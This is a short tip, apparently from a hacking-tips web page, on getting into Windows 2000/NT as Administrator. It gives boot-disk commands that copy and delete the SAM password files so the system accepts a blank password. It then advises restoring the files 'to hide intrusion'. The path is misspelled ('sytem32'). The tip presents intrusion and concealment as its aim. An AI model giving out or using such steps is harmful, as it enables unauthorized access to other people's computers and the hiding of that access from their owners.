Reset Administrator password in Windows 2000/NT
Get in windows 2000 as Administrator.
NOTE: Requires a boot disk.
Get the command prompt and go to C:\winnt\sytem32\config\ and do
the following commands:
attrib -a -r -h
copy sam.* a:\
del Sam.*
Reboot the computer now. There should be no administrator password.
Just login as Administrator and hit enter. Replace the sam files to
restore the password to hide intrusion.
Popularity: 5%



